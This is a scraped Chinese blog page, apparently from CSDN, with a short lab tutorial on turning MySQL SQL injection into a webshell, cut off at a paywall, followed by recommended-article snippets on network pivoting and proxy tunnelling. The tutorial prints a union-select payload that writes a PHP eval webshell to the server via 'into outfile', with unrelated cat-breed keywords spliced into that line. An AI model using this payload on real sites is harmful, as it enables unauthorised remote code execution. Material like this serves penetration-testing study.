记一次简单的从外网到内网渗透

最新推荐文章于 2024-06-17 17:12:17 发布
最新推荐文章于 2024-06-17 17:12:17 发布
阅读量323 收藏
点赞数
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45701675/article/details/121574497
版权

一、SQL注入getshell


1、直接SQL语法写文件

(1)Mysql导出函数:
into outfile
into dumpfile [可以写16进制写入]
(2)1290的安全性报错:
是5.0版本之后,来禁止MySQL给本地存放数据
需要修改MySQL的配置文件写一个:secure-file-priv=来防止1290的安全性报错

(3)这里需要注意:
我们得写绝对路径,绝对路径我们可以通过让网页PHP报错出来,并且双写\来防止\被MySQL转义了

(4)最终语句:(靶场)
宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍 union select 1,’<?php eval($_REQUEST[1230])?>’ into outfile ‘C:\phpStudy\WWW\lele.php’


2、日志法(需要存在堆叠注入才能写shell绕过1290&

最低0.47元/天 解锁文章
无名安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
从零开始学安:Day3 体验跨渗透与后渗透经验分享
无业de小白的博客
05-07 381
这一次分享一些跨渗透简单渗透操作体验。可以当成两个独立的实验来看待。有尝试过两个合并完成,但由于winxp连接不稳定等因素,展示后渗透效果没有直接在win7上展示好。所以可以换一下实验流程,将winxp作为跳板,win7作为靶机效果更好。
渗透测试实战 - 渗透穿透(超详细)
HAKUNAMATATATTA的博客
02-18 7109
渗透测试实验,渗透和内穿透的详细操作过程以及内代理和内探测的方法
工控攻防演示-从到内设备的入侵
曲终人散
08-06 2469
· 一、 概述 1. 实验目的 通过工控靶场学习web渗透、内渗透、工控安全相关知识技能。 2. 靶场信息 本实验通过vmware 搭建了靶场的和内环境,在内环境中,可以连接到真实的PLC进行漏洞利用。 靶场络拓扑如下: 该络环境中,有两台攻击机处于模拟中,分别是一台 windows7 主机和 kali 主机,通过这两台主机进行漏洞利用,获取内访问权限,进一步获取西门子PLC的控制权,从而控制城市沙盘。 二、 演示过程 1. 资产发现 登录 kali 攻击机,输入 ifconfig 查
ONE DAY |络安全渗透测试之跨段攻击
EverUP
05-04 1839
渗透测试就是模拟真实黑客的攻击手法对目标站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
渗透-做代理流量转发-msf跨段攻击(添加路由表)-Windows中ew和proxifier做代理-kali中ew和proxychains4做代理
BING
05-17 2221
0x01代理-windows中ew和proxifier 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s sscoked -l 8000 2.在windows启用proxifier,添加服务器,输入靶机上的ip和端口 3.设置代理规则 第一步截图: 第二步截图: 第三步截图: 你可以使用代理了 0x02代理-kali中ew和proxychains4做代理 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s
渗透之跨路由访问
qq_56426046的博客
11-16 1305
渗透测试过程中,经常拿到web主机与数据库不同在一个段,可以得出这台主机还连着一个内, 如果想要继续渗透,可以把这台web主机当作跳板机,对内进行渗透。kali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做 跳板访问目标主机 获取内卡命令。msf使用隧道模块 默认是使用socks5 也可以选择socks4a。绑定路由 不绑定路由就没法访问目标主机。使用代理隧道nmap扫描内主机。末将于禁,愿为曹家世代赴汤蹈火。msf 使用代理访问目标。
渗透之常见命令
03-14
渗透之常见命令,详细列数了渗透的过程中所用到的所有技术,命令
谈一谈渗透测试流程
02-24
渗透测试是指渗透人员在不同的位置(比如从内、从等位置)利用各种手段对某个特定络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给络所有者。络所有者根据渗透人员提供的...
络安全-渗透完整笔
03-27
换句话来说,渗透测试是指渗透人员在不同的位置(比如从内、从等位置)利用各种手段对某个特定络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给络所有者。渗透测试的目的是...
常考渗透测试面试题.pdf
09-29
* SSRF漏洞:攻击者可以通过构造恶意请求,访问服务器内资源,导致敏感数据泄露或权限提升。 * XML注入漏洞:攻击者可以通过inject恶意XML代码,获取敏感数据或控制系统。 * 逻辑漏洞:攻击者可以通过...
渗透测试入门4之内跨边界应用
鹿鸣天涯
04-03 690
渗透测试入门4之内跨边界应用 内跨边界转发 NC端口转发 LCX端口转发 nps 代理脚本 Tunna Reduh ... 内跨边界代理穿透 EW 正向 SOCKS v5 服务器: ./ew -s ssocksd -l 1080 反弹 SOCKS v5 服务器: a) 先在一台具有公 ip 的主机A上运行以下命令: $ ./ew -s rcsocks ...
一次getshell到内横向的练习
laozhang338的博客
07-27 200
本身是没有问题的,说明psexec已经成功的完成了ntml认证,并且认证成功,但是这时候shell是反弹给边缘机器的,如果要上线就要再新建一个SMB Beacon Listener(SMB监听器)。到这里不懂原理的小白(我)可能就会直接使用cs自带的psexec功能直接去横向,恰巧我之前就是这么做的(卡了三个小时)(3)并且有个好处就是SMB协议一般防火墙是不拦截的,在一定程度上可以规避防火墙拦截。内的机器密码有可能都是相同的所以我们那之前的密码,撞库试一下。大家可以自己搭建,也可以用我的,公众号!
Windows络服务渗透测试实战-跨段攻击
c_lanxiaofang的博客
05-19 6178
一、实验项目名称 Windows络服务渗透测试实战-跨段攻击 二、实验目的及要求 掌握对跨段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
NET穿透技术---UDP打孔
nyist327的专栏
04-22 3807
络编码中会发现程序在局域中是可以适用的,但是在与内之间和内与内之间就不可行。 问题就在于NAT。首先介绍下NAT。  NAT的作用NAT(Network Address Translator),络地址转换。顾名思义,它是一种把内部私有络IP地址翻译成公有络IP地址的技术,如图5-1所示。NAT是在IP地址日益缺乏的情况下产生的,它的主要目的是使地址能够重用[9]。   
***应用 跨vlan***的一种思路
weixin_33968104的博客
09-30 182
随着日益发展的络技术,络线路也变的越来越复杂。***测试人员在web中通过注入,上传等基本或高级脚本***方法到达了边界服务器。再深入时则会面对更复杂的络,比如乱七八糟的vlan环境。什么是vlan:http://baike.baidu.com/history/id=9328829测试拓扑图0×01 测试基本状况概述一共选取了三台服务器和一个H3C s3610三层交换机...
***之跨Vlan***的一种方法
weixin_34205076的博客
06-14 406
http://www.91ri.org/7310.html前言随着日益发展的络技术,络线路也变的越来越复杂。***测试人员在web中通过注入,上传等基本或高级脚本***方法到达了边界服务器。再深入时则会面对更复杂的络环境,比如如何跨vlan。本文旨在讲述获取内权限后突破VLAN的限制进行***的一种思路。(与上流传的A大神的***方法出入较大,请勿混淆)测试拓扑图测...
渗透系列:内跨边界应用
闵行小鱼塘
07-27 1226
与《内渗透系列:内穿透(隧道)学习》可以互相补充
【大数据】Spark使用大全:下载安装、RDD操作、JAVA编程、SQL
Joker_ZJN的博客
06-13 968
一文详解Spark的使用
SQLAlchemy 连接池
最新发布
youhebuke225的博客
06-17 127
调整这些参数可以帮助你更好地管理数据库连接,并减少因连接超时或服务器断开连接而导致的问题。得根据你的应用程序的需求和数据库服务器的配置来合理设置这些参数。在 SQLAlchemy 中,确实可以通过配置连接池的参数来管理连接的超时和回收,从而确保连接在需要时能够被重新建立。SQLAlchemy 使用的是。作为其默认的连接池实现。为了配置这些参数,你可以在创建引擎时将它们传递给。
如何 从映射到内
06-11
将内服务映射到公,可以使用端口映射技术来实现。以下是一些实现端口映射的方法: 1. 使用路由器的端口映射功能:将路由器的公IP与内设备的IP地址及端口号进行映射,当公访问该IP及端口时,路由器会将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值